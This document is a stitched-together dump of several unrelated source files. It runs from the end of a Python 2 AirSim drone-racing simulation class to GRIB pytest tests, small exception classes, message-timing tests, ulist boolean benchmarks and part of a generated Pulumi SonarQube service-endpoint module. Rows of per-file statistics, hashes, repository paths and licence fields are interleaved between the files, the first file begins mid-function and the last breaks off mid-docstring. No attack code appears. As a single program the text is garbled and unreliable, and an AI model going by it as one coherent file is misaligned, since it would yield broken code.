# print "Drone is out of the path. Current cost: {0:.6}".format(self.MP_cost[method])
# if self.flight_log:
# f.write("\nDrone is out of the path. Current cost: {0:.6}".format(self.MP_cost[method]))
# break
# if (not track_completed) and (not fail_check): # drone didn't arrive or crash
# self.MP_cost[method] = self.Tf * self.quad.costValue + cov_coeff*np.sum(prediction_std)
# print "Drone hasn't reached the gate yet. Current cost: {0:.6}".format(self.MP_cost[method])
# if self.flight_log:
# f.write("\nDrone hasn't reached the gate yet. Current cost: {0:.6}".format(self.MP_cost[method]))
# self.write_stats(flight_columns,
# [true_init_pos[0], true_init_pos[1], true_init_pos[2], posf[0]-pos0[0], posf[1]-pos0[1], posf[2]-pos0[2], -phi_start, -theta_start, yawf-yaw0,
# prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3], self.Tf, method, self.MP_cost[method]], flight_filename)
# #print "Flight data is written to the file"
# self.quad.costValue = 0.
# if track_completed or fail_check: # drone arrived to the gate or crashed
# break
# self.curr_idx += 1
def fly_drone_2(self, f, method, pos_offset, angle_start):
pose_prediction = np.zeros((1000,4),dtype=np.float32)
prediction_std = np.zeros((4,1),dtype=np.float32)
x_offset, y_offset, z_offset = pos_offset
phi_start, theta_start, gate_psi, psi_start = angle_start
#if drone is at initial point
quad_pose = [self.drone_init.position.x_val+x_offset, self.drone_init.position.y_val+y_offset, self.drone_init.position.z_val+z_offset, -phi_start, -theta_start, psi_start]
self.state0 = [self.drone_init.position.x_val+x_offset, self.drone_init.position.y_val+y_offset, self.drone_init.position.z_val+z_offset, phi_start, theta_start, psi_start, 0., 0., 0., 0., 0., 0.]
self.client.simSetVehiclePose(QuadPose(quad_pose), True)
self.quad = Quadrotor(self.state0)
self.curr_idx = 0
self.test_states.append(self.quad.state)
self.xd_ddot_pr = 0.
self.yd_ddot_pr = 0.
self.xd_dddot_pr = 0.
self.yd_dddot_pr = 0.
self.psid_pr = 0.
self.psid_dot_pr = 0.
self.blur_range = 0.01
self.blur_coeff = random.uniform(0, self.blur_range)
track_completed = False
fail_check = False
final_target = [self.track[-1].position.x_val, self.track[-1].position.y_val, self.track[-1].position.z_val]
self.trajSelect[0] = 3 #min_vel
self.trajSelect[1] = 2 #yaw_follow
self.trajSelect[2] = 0 #time based
while((not track_completed) and (not fail_check)):
image_response = self.client.simGetImages([airsim.ImageRequest('0', airsim.ImageType.Scene, False, False)])[0]
#if len(image_response.image_data_uint8) == image_response.width * image_response.height * 3:
img1d = np.fromstring(image_response.image_data_uint8, dtype=np.uint8) # get numpy array
img_rgb = img1d.reshape(image_response.height, image_response.width, 3) # reshape array to 4 channel image array H X W X 3
img_rgb = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2RGB)
#cv2.imwrite(os.path.join(self.base_path, 'images', "frame" + str(self.curr_idx).zfill(len(str(self.num_samples))) + '.png'), img_rgb)
img = Image.fromarray(img_rgb)
image = self.transformation(img)
quad_pose = [self.quad.state[0], self.quad.state[1], self.quad.state[2], -self.quad.state[3], -self.quad.state[4], self.quad.state[5]]
with torch.no_grad():
# Determine Gat location with Neural Networks
pose_gate_body = self.Dronet(image)
for i,num in enumerate(pose_gate_body.reshape(-1,1)):
#print(num, i , self.curr_idx)
pose_prediction[self.curr_idx][i] = num.item()
if self.curr_idx >= 11:
pose_gate_cov = self.lstmR(torch.from_numpy(pose_prediction[self.curr_idx-11:self.curr_idx+1].reshape(1,12,4)).to(self.device))
for i, p_g_c in enumerate(pose_gate_cov.reshape(-1,1)):
prediction_std[i] = p_g_c.item()
# Gate ground truth values will be implemented
pose_gate_body = pose_gate_body.numpy().reshape(-1,1)
prediction_std = np.clip(prediction_std, 0, prediction_std)
prediction_std = prediction_std.ravel()
covariance_sum = np.sum(prediction_std)
self.Tf = self.time_coeff*pose_gate_body[0][0]
# Trajectory generate
waypoint_world = spherical_to_cartesian(self.quad.state, pose_gate_body)
waypoint_world = [self.track[self.current_gate].position.x_val, self.track[self.current_gate].position.y_val, self.track[self.current_gate].position.z_val]
pos0 = [self.quad.state[0], self.quad.state[1], self.quad.state[2]]
vel0 = [self.quad.state[6], self.quad.state[7], self.quad.state[8]]
acc0 = [0., 0., 0.]
posf = [waypoint_world[0], waypoint_world[1], waypoint_world[2]]
velf = [float(posf[0]-pos0[0])/self.Tf, float(posf[1]-pos0[1])/self.Tf, float(posf[2]-pos0[2])/self.Tf]
accf = [0., 0., 0.]
yaw0 = self.quad.state[5]
yaw_diff = pose_gate_body[3][0]
yawf = (self.quad.state[5]+yaw_diff) + np.pi/2
yawf = Rotation.from_quat([self.track[self.current_gate].orientation.x_val, self.track[self.current_gate].orientation.y_val,
self.track[self.current_gate].orientation.z_val, self.track[self.current_gate].orientation.w_val]).as_euler('ZYX',degrees=False)[0] - np.pi/2
print "MP algorithm: " + method
print "Estimated time of arrival: " + str(self.Tf) + " s."
if self.flight_log:
f.write("\nPrediction mode is off. MP algorithm: " + method)
f.write("\nEstimated time of arrival: " + str(self.Tf) + " s.")
print "\nGate Predicted, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(waypoint_world[0], waypoint_world[1], waypoint_world[2], yawf*180/np.pi)
print "Variance values, r: {0:.3}, phi: {1:.3}, theta: {2:.3}, psi: {3:.3}".format(prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3])
print "Blurring coefficient: {0:.3}/{1:.3}".format(self.blur_coeff,self.blur_range)
if self.flight_log:
f.write("\nGate Predicted, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(waypoint_world[0], waypoint_world[1], waypoint_world[2], yawf*180/np.pi))
f.write("\nVariance values, r: {0:.3}, phi: {1:.3}, theta: {2:.3}, psi: {3:.3}".format(prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3]))
f.write("\nBlurring coefficient: {0:.3}/{1:.3}".format(self.blur_coeff,self.blur_range))
if method == "min_jerk":
mp_algorithm = MyTraj(gravity = -9.81)
traj = mp_algorithm.givemetraj(pos0, vel0, acc0, posf, velf, accf, self.Tf)
else:
self.trajSelect[0] = self.MP_methods[method]
# pos_next = np.array(velf) * self.Tf
# time_list = np.hstack((0., self.Tf, 2*self.Tf)).astype(float)
# waypoint_list = np.vstack((pos0, posf, pos_next)).astype(float)
time_list = np.hstack((0., self.Tf)).astype(float)
waypoint_list = np.vstack((pos0, posf)).astype(float)
yaw_list = np.hstack((yaw0, yawf)).astype(float)
newTraj = Trajectory(self.trajSelect, self.quad.state, time_list, waypoint_list, yaw_list)
Waypoint_length = int(self.Tf / self.dtau)
t_list = linspace(0., self.Tf, num = Waypoint_length)
# Call for Controller
for t_current in t_list:
pos_des, vel_des, acc_des, euler_des = newTraj.desiredState(t_current, self.dtau, self.quad.state)
if method == "min_jerk":
pos_des, vel_des, acc_des = mp_algorithm.givemepoint(traj, t_current)
xd, yd, zd = pos_des[0], pos_des[1], pos_des[2]
xd_dot, yd_dot, zd_dot = vel_des[0], vel_des[1], vel_des[2]
xd_ddot, yd_ddot, zd_ddot = acc_des[0], acc_des[1], acc_des[2]
xd_dddot = (xd_ddot - self.xd_ddot_pr) / self.dtau
yd_dddot = (yd_ddot - self.yd_ddot_pr) / self.dtau
xd_ddddot = (xd_dddot - self.xd_dddot_pr) / self.dtau
yd_ddddot = (yd_dddot - self.yd_dddot_pr) / self.dtau
psid = euler_des[2]
psid_dot = (psid - self.psid_pr) / self.dtau
psid_ddot = (psid_dot - self.psid_dot_pr) / self.dtau
current_traj = [xd, yd, zd, xd_dot, yd_dot, zd_dot, xd_ddot, yd_ddot, zd_ddot,
xd_dddot, yd_dddot, xd_ddddot, yd_ddddot,
psid, psid_dot, psid_ddot]
fail_check = self.quad.simulate(self.dtau, current_traj, final_target, prediction_std)
quad_pose = [self.quad.state[0], self.quad.state[1], self.quad.state[2], -self.quad.state[3], -self.quad.state[4], self.quad.state[5]]
self.test_states.append(self.quad.state)
self.client.simSetVehiclePose(QuadPose(quad_pose), True)
self.xd_ddot_pr = xd_ddot
self.yd_ddot_pr = yd_ddot
self.xd_dddot_pr = xd_dddot
self.yd_dddot_pr = yd_dddot
self.psid_pr = psid
self.psid_dot_pr = psid_dot
self.x_dot_pr = self.quad.state[6]
self.y_dot_pr = self.quad.state[7]
self.z_dot_pr = self.quad.state[8]
if fail_check:
self.test_cost = self.quad.costValue
print "Drone has crashed! Current cost: {0:.6}".format(self.test_cost)
if self.flight_log:
f.write("\nDrone has crashed! Current cost: {0:.6}".format(self.test_cost))
break
check_arrival, on_road = self.check_completion(quad_pose, -1, test_control = True)
if check_arrival: # drone arrives to the gate
track_completed = True
self.test_cost = newTraj.t_wps[1] * self.quad.costValue
print "Drone has arrived finished the lap. Current cost: {0:.6}".format(self.test_cost)
if self.flight_log:
f.write("\nDrone has finished the lap. Current cost: {0:.6}".format(self.test_cost))
break
elif not on_road: #drone can not complete the path, but still loop should be ended
track_completed = True
self.test_cost = self.quad.costValue
print "Drone is out of the path. Current cost: {0:.6}".format(self.test_cost)
if self.flight_log:
f.write("\nDrone is out of the path. Current cost: {0:.6}".format(self.test_cost))
break
if (not track_completed) and (not fail_check): # drone didn't arrive or crash
self.test_cost = newTraj.t_wps[1] * self.quad.costValue
print "Drone hasn't reached the gate yet. Current cost: {0:.6}".format(self.test_cost)
if self.flight_log:
f.write("\nDrone hasn't reached the gate yet. Current cost: {0:.6}".format(self.test_cost))
if track_completed or fail_check: # drone arrived to the gate or crashed
break
self.curr_idx += 1
# def visualize_drone(self, MP_list):
# for algorithm in MP_list:
# print "Drone flies by the algorithm, ", algorithm
# self.client.simSetVehiclePose(self.drone_init, True)
# state_list = self.MP_states[algorithm]
# for state in state_list:
# quad_pose = [state[0], state[1], state[2], -state[3], -state[4], state[5]]
# self.client.simSetVehiclePose(QuadPose(quad_pose), True)
# time.sleep(0.001)
# def get_video(self, algorithm):
# pathIn= self.base_path + 'images/'
# pathOut = self.base_path + algorithm + '_video.avi'
# fps = 0.5
# frame_array = []
# files = [f for f in os.listdir(pathIn) if isfile(join(pathIn, f))]#for sorting the file names properly
# files.sort(key = lambda x: x[5:-4])
# for i in range(len(files)):
# filename=pathIn + files[i]
# #reading each files
# img = cv2.imread(filename)
# height, width, layers = img.shape
# size = (width,height)
# #inserting the frames into an image array
# frame_array.append(img)
# out = cv2.VideoWriter(pathOut,cv2.VideoWriter_fourcc(*'DIVX'), fps, size)
# for i in range(len(frame_array)):
# # writing to a image array
# out.write(frame_array[i])
# out.release()
| 56.54536
| 260
| 0.546075
| 7,202
| 54,227
| 3.900028
| 0.063177
| 0.038735
| 0.051837
| 0.013351
| 0.843421
| 0.811343
| 0.794717
| 0.780867
| 0.759292
| 0.747152
| 0
| 0.033493
| 0.325521
| 54,227
| 958
| 261
| 56.604384
| 0.734463
| 0.369447
| 0
| 0.636771
| 0
| 0.029148
| 0.071412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.071749
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbe93c747774c0062a1ad953e6a0fee126693c5d
| 3,959
|
py
|
Python
|
tests/format/grib/eccodes/field/test_field_name.py
|
perillaroc/nwpc-data
|
44d75011609e5d2d8bd8a704c7b529e0aceb7ed4
|
[
"Apache-2.0"
] | 3
|
2021-10-31T13:59:04.000Z
|
2022-03-08T06:45:41.000Z
|
tests/format/grib/eccodes/field/test_field_name.py
|
perillaroc/nwpc-data
|
44d75011609e5d2d8bd8a704c7b529e0aceb7ed4
|
[
"Apache-2.0"
] | null | null | null |
tests/format/grib/eccodes/field/test_field_name.py
|
perillaroc/nwpc-data
|
44d75011609e5d2d8bd8a704c7b529e0aceb7ed4
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from typing import Dict, Union, Optional
from dataclasses import dataclass, asdict
from reki.format.grib.eccodes import load_field_from_file
@dataclass
class QueryOption:
parameter: Union[str, Dict] = None
level_type: str = None
level: float = None
field_name: Optional[str] = None
@dataclass
class TestCase:
query: QueryOption
expected_field_name: str
def test_parameter_string(file_path):
test_cases = [
TestCase(
query=QueryOption(parameter="t", level_type="pl", level=850, field_name=None),
expected_field_name="t"
),
TestCase(
query=QueryOption(parameter="t", level_type="pl", level=850, field_name="other_field_name"),
expected_field_name="other_field_name"
),
TestCase(
query=QueryOption(parameter="TMP", level_type="pl", level=850, field_name=None),
expected_field_name="TMP"
),
TestCase(
query=QueryOption(parameter="TMP", level_type="pl", level=850, field_name="other_field_name"),
expected_field_name="other_field_name"
)
]
for test_case in test_cases:
f = load_field_from_file(
file_path,
**asdict(test_case.query)
)
assert f is not None
assert f.name == test_case.expected_field_name
def test_parameter_cemc_param_db(file_path):
test_cases = [
TestCase(
query=QueryOption(parameter="btv", field_name=None),
expected_field_name="btv"
),
TestCase(
query=QueryOption(parameter="zs", field_name=None),
expected_field_name="zs",
),
]
for test_case in test_cases:
f = load_field_from_file(
file_path,
**asdict(test_case.query)
)
assert f is not None
assert f.name == test_case.expected_field_name
def test_parameter_dict(file_path):
test_cases = [
TestCase(
query=QueryOption(
parameter=dict(discipline=0, parameterCategory=2, parameterNumber=224),
level_type="pl",
level=850,
field_name=None,
),
expected_field_name="0_2_224"
),
TestCase(
query=QueryOption(
parameter=dict(discipline=0, parameterCategory=2, parameterNumber=224),
level_type="pl",
level=850,
field_name="other_field_name"
),
expected_field_name="other_field_name"
),
TestCase(
query=QueryOption(
parameter=dict(discipline=0, parameterCategory=2, parameterNumber=227),
level_type="sfc",
field_name=None
),
expected_field_name="0_2_227"
),
TestCase(
query=QueryOption(
parameter=dict(discipline=0, parameterCategory=2, parameterNumber=227),
level_type="sfc",
field_name="other_field_name"
),
expected_field_name="other_field_name"
),
TestCase(
query=QueryOption(
parameter=dict(discipline=0, parameterCategory=5, parameterNumber=4),
level_type="sfc",
field_name=None,
),
expected_field_name="ulwrf"
),
TestCase(
query=QueryOption(
parameter=dict(discipline=0, parameterCategory=5, parameterNumber=4),
level_type="sfc",
field_name="other_field_name",
),
expected_field_name="other_field_name"
)
]
for test_case in test_cases:
f = load_field_from_file(
file_path,
**asdict(test_case.query),
)
assert f is not None
assert f.name == test_case.expected_field_name
| 29.766917
| 106
| 0.572367
| 414
| 3,959
| 5.181159
| 0.149758
| 0.163636
| 0.126807
| 0.184615
| 0.820047
| 0.820047
| 0.792075
| 0.792075
| 0.751049
| 0.731469
| 0
| 0.020564
| 0.336701
| 3,959
| 132
| 107
| 29.992424
| 0.796268
| 0
| 0
| 0.669492
| 0
| 0
| 0.056833
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 1
| 0.025424
| false
| 0
| 0.033898
| 0
| 0.127119
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbf21a10cee00fba8c52f28cc9b7e5343e98400b
| 456
|
py
|
Python
|
profanity_police/exceptions.py
|
vivekkumar2696/profanity-police
|
18479e0ff4cc90bb226588c0e9962aea09570c52
|
[
"MIT"
] | 3
|
2021-06-21T21:22:19.000Z
|
2022-01-14T06:56:20.000Z
|
profanity_police/exceptions.py
|
vivekkumar2696/profanity-police
|
18479e0ff4cc90bb226588c0e9962aea09570c52
|
[
"MIT"
] | null | null | null |
profanity_police/exceptions.py
|
vivekkumar2696/profanity-police
|
18479e0ff4cc90bb226588c0e9962aea09570c52
|
[
"MIT"
] | null | null | null |
class InvalidYoutubeURLError(Exception):
def __init__(self, message, errors = None):
super().__init__(message)
self.errors = errors
class TranscriptNotFoundError(Exception):
def __init__(self, message, errors = None):
super().__init__(message)
self.errors = errors
class InvalidArgumentError(Exception):
def __init__(self, message, errors = None):
super().__init__(message)
self.errors = errors
| 32.571429
| 47
| 0.682018
| 45
| 456
| 6.377778
| 0.266667
| 0.125436
| 0.167247
| 0.209059
| 0.756098
| 0.756098
| 0.756098
| 0.756098
| 0.756098
| 0.756098
| 0
| 0
| 0.212719
| 456
| 14
| 48
| 32.571429
| 0.799443
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e00435633525c33eb8bca2a05e93a197e4e0a743
| 990
|
py
|
Python
|
tests/test_fixture_msg.py
|
ddk50/upfg_rina
|
c6808ffec6dd8c84ab1c02721ab2b57f29a5283b
|
[
"MIT"
] | null | null | null |
tests/test_fixture_msg.py
|
ddk50/upfg_rina
|
c6808ffec6dd8c84ab1c02721ab2b57f29a5283b
|
[
"MIT"
] | null | null | null |
tests/test_fixture_msg.py
|
ddk50/upfg_rina
|
c6808ffec6dd8c84ab1c02721ab2b57f29a5283b
|
[
"MIT"
] | null | null | null |
import pytest
import datetime
from .context import Notifications
from .context import Msg
@pytest.fixture
def init():
return None
def test_one():
now = datetime.datetime.now()
event_time = now + datetime.timedelta(hours=23)
msg = Msg(event_time, "hello")
r = msg.broadcast_or_not(now)
assert r == "hello"
# def test_two():
# now = datetime.datetime.now()
# event_time = now + datetime.timedelta(hours=3)
# msg = Msg(event_time, "hello")
# r = msg.broadcast_or_not(now)
# assert r == None
# def test_three():
# now = datetime.datetime.now()
# event_time = now + datetime.timedelta(hours=50)
# msg = Msg(event_time, "hello")
# r = msg.broadcast_or_not(now)
# assert r == None
# def test_four():
# now = datetime.datetime.now()
# event_time = now + datetime.timedelta(hours=3)
# msg = Msg(event_time, "hello")
# r = msg.broadcast_or_not(now)
# assert r == None
| 20.625
| 53
| 0.614141
| 130
| 990
| 4.523077
| 0.238462
| 0.14966
| 0.129252
| 0.14966
| 0.755102
| 0.755102
| 0.755102
| 0.755102
| 0.755102
| 0.755102
| 0
| 0.008119
| 0.253535
| 990
| 47
| 54
| 21.06383
| 0.787551
| 0.581818
| 0
| 0
| 0
| 0
| 0.025381
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.153846
| false
| 0
| 0.307692
| 0.076923
| 0.538462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e0517c6a70594814882908b23448e97ec139c388
| 2,512
|
py
|
Python
|
benchmark/boolean.py
|
tushushu/uvec
|
ab57251136d375a5e47a61af9a3262394795c0db
|
[
"BSD-3-Clause"
] | 7
|
2021-11-29T02:43:15.000Z
|
2022-01-03T13:59:11.000Z
|
benchmark/boolean.py
|
tushushu/uvec
|
ab57251136d375a5e47a61af9a3262394795c0db
|
[
"BSD-3-Clause"
] | 87
|
2022-01-10T13:15:23.000Z
|
2022-03-31T12:10:15.000Z
|
benchmark/boolean.py
|
tushushu/ulist
|
987d3a1bbcf2caab7ed2253d94921b1588e5175f
|
[
"BSD-3-Clause"
] | null | null | null |
from random import choice, seed
from ulist.utils import Benchmarker
seed(100)
class AllIsTrue(Benchmarker):
def cases(self) -> list:
return [
([True for _ in range(100)],),
([True for _ in range(1000)],),
([True for _ in range(10000)],),
([True for _ in range(100000)],),
([True for _ in range(1000000)],),
]
def ulist_fn(self, args) -> None:
args[0].all()
def other_fn(self, args) -> None:
args[0].all()
class AndOp(Benchmarker):
def cases(self) -> list:
return [
([choice([False, True]) for _ in range(100)],),
([choice([False, True]) for _ in range(1000)],),
([choice([False, True]) for _ in range(10000)],),
([choice([False, True]) for _ in range(100000)],),
([choice([False, True]) for _ in range(1000000)],),
]
def ulist_fn(self, args) -> None:
args[0] & args[0]
def other_fn(self, args) -> None:
args[0] & args[0]
class AnyIsTrue(Benchmarker):
def cases(self) -> list:
return [
([False for _ in range(100)],),
([False for _ in range(1000)],),
([False for _ in range(10000)],),
([False for _ in range(100000)],),
([False for _ in range(1000000)],),
]
def ulist_fn(self, args) -> None:
args[0].any()
def other_fn(self, args) -> None:
args[0].any()
class NotOp(Benchmarker):
def cases(self) -> list:
return [
([choice([False, True]) for _ in range(100)],),
([choice([False, True]) for _ in range(1000)],),
([choice([False, True]) for _ in range(10000)],),
([choice([False, True]) for _ in range(100000)],),
([choice([False, True]) for _ in range(1000000)],),
]
def ulist_fn(self, args) -> None:
~(args[0])
def other_fn(self, args) -> None:
~(args[0])
class OrOp(Benchmarker):
def cases(self) -> list:
return [
([choice([False, True]) for _ in range(100)],),
([choice([False, True]) for _ in range(1000)],),
([choice([False, True]) for _ in range(10000)],),
([choice([False, True]) for _ in range(100000)],),
([choice([False, True]) for _ in range(1000000)],),
]
def ulist_fn(self, args) -> None:
args[0] | args[0]
def other_fn(self, args) -> None:
args[0] | args[0]
| 27.604396
| 63
| 0.504777
| 299
| 2,512
| 4.123746
| 0.120401
| 0.101379
| 0.202758
| 0.227088
| 0.83455
| 0.774534
| 0.721006
| 0.711273
| 0.667478
| 0.667478
| 0
| 0.083187
| 0.320462
| 2,512
| 90
| 64
| 27.911111
| 0.639133
| 0
| 0
| 0.661765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.220588
| false
| 0
| 0.029412
| 0.073529
| 0.397059
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e065ba9590cb82972c71f3fb8a85de6fb174057e
| 19,017
|
py
|
Python
|
sdk/python/pulumi_azuredevops/service_endpoint_sonar_qube.py
|
pulumi/pulumi-azuredevops
|
e6d73d1501335037fb944ae627091a7afc7f0048
|
[
"ECL-2.0",
"Apache-2.0"
] | 13
|
2020-06-28T11:39:32.000Z
|
2022-03-05T13:34:16.000Z
|
sdk/python/pulumi_azuredevops/service_endpoint_sonar_qube.py
|
pulumi/pulumi-azuredevops
|
e6d73d1501335037fb944ae627091a7afc7f0048
|
[
"ECL-2.0",
"Apache-2.0"
] | 58
|
2020-06-20T14:00:28.000Z
|
2022-03-31T15:20:51.000Z
|
sdk/python/pulumi_azuredevops/service_endpoint_sonar_qube.py
|
pulumi/pulumi-azuredevops
|
e6d73d1501335037fb944ae627091a7afc7f0048
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-10-21T03:22:01.000Z
|
2021-12-10T18:26:59.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ServiceEndpointSonarQubeArgs', 'ServiceEndpointSonarQube']
@pulumi.input_type
class ServiceEndpointSonarQubeArgs:
def __init__(__self__, *,
project_id: pulumi.Input[str],
service_endpoint_name: pulumi.Input[str],
token: pulumi.Input[str],
url: pulumi.Input[str],
authorization: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ServiceEndpointSonarQube resource.
:param pulumi.Input[str] project_id: The project ID or project name.
:param pulumi.Input[str] service_endpoint_name: The Service Endpoint name.
:param pulumi.Input[str] token: Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
:param pulumi.Input[str] url: URL of the SonarQube server to connect with.
:param pulumi.Input[str] description: The Service Endpoint description.
"""
pulumi.set(__self__, "project_id", project_id)
pulumi.set(__self__, "service_endpoint_name", service_endpoint_name)
pulumi.set(__self__, "token", token)
pulumi.set(__self__, "url", url)
if authorization is not None:
pulumi.set(__self__, "authorization", authorization)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
The project ID or project name.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="serviceEndpointName")
def service_endpoint_name(self) -> pulumi.Input[str]:
"""
The Service Endpoint name.
"""
return pulumi.get(self, "service_endpoint_name")
@service_endpoint_name.setter
def service_endpoint_name(self, value: pulumi.Input[str]):
pulumi.set(self, "service_endpoint_name", value)
@property
@pulumi.getter
def token(self) -> pulumi.Input[str]:
"""
Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
"""
return pulumi.get(self, "token")
@token.setter
def token(self, value: pulumi.Input[str]):
pulumi.set(self, "token", value)
@property
@pulumi.getter
def url(self) -> pulumi.Input[str]:
"""
URL of the SonarQube server to connect with.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: pulumi.Input[str]):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def authorization(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "authorization")
@authorization.setter
def authorization(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "authorization", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The Service Endpoint description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@pulumi.input_type
class _ServiceEndpointSonarQubeState:
def __init__(__self__, *,
authorization: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
service_endpoint_name: Optional[pulumi.Input[str]] = None,
token: Optional[pulumi.Input[str]] = None,
token_hash: Optional[pulumi.Input[str]] = None,
url: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ServiceEndpointSonarQube resources.
:param pulumi.Input[str] description: The Service Endpoint description.
:param pulumi.Input[str] project_id: The project ID or project name.
:param pulumi.Input[str] service_endpoint_name: The Service Endpoint name.
:param pulumi.Input[str] token: Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
:param pulumi.Input[str] token_hash: A bcrypted hash of the attribute 'token'
:param pulumi.Input[str] url: URL of the SonarQube server to connect with.
"""
if authorization is not None:
pulumi.set(__self__, "authorization", authorization)
if description is not None:
pulumi.set(__self__, "description", description)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if service_endpoint_name is not None:
pulumi.set(__self__, "service_endpoint_name", service_endpoint_name)
if token is not None:
pulumi.set(__self__, "token", token)
if token_hash is not None:
pulumi.set(__self__, "token_hash", token_hash)
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter
def authorization(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "authorization")
@authorization.setter
def authorization(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "authorization", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The Service Endpoint description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The project ID or project name.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="serviceEndpointName")
def service_endpoint_name(self) -> Optional[pulumi.Input[str]]:
"""
The Service Endpoint name.
"""
return pulumi.get(self, "service_endpoint_name")
@service_endpoint_name.setter
def service_endpoint_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_endpoint_name", value)
@property
@pulumi.getter
def token(self) -> Optional[pulumi.Input[str]]:
"""
Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
"""
return pulumi.get(self, "token")
@token.setter
def token(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "token", value)
@property
@pulumi.getter(name="tokenHash")
def token_hash(self) -> Optional[pulumi.Input[str]]:
"""
A bcrypted hash of the attribute 'token'
"""
return pulumi.get(self, "token_hash")
@token_hash.setter
def token_hash(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "token_hash", value)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the SonarQube server to connect with.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
class ServiceEndpointSonarQube(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorization: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
service_endpoint_name: Optional[pulumi.Input[str]] = None,
token: Optional[pulumi.Input[str]] = None,
url: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
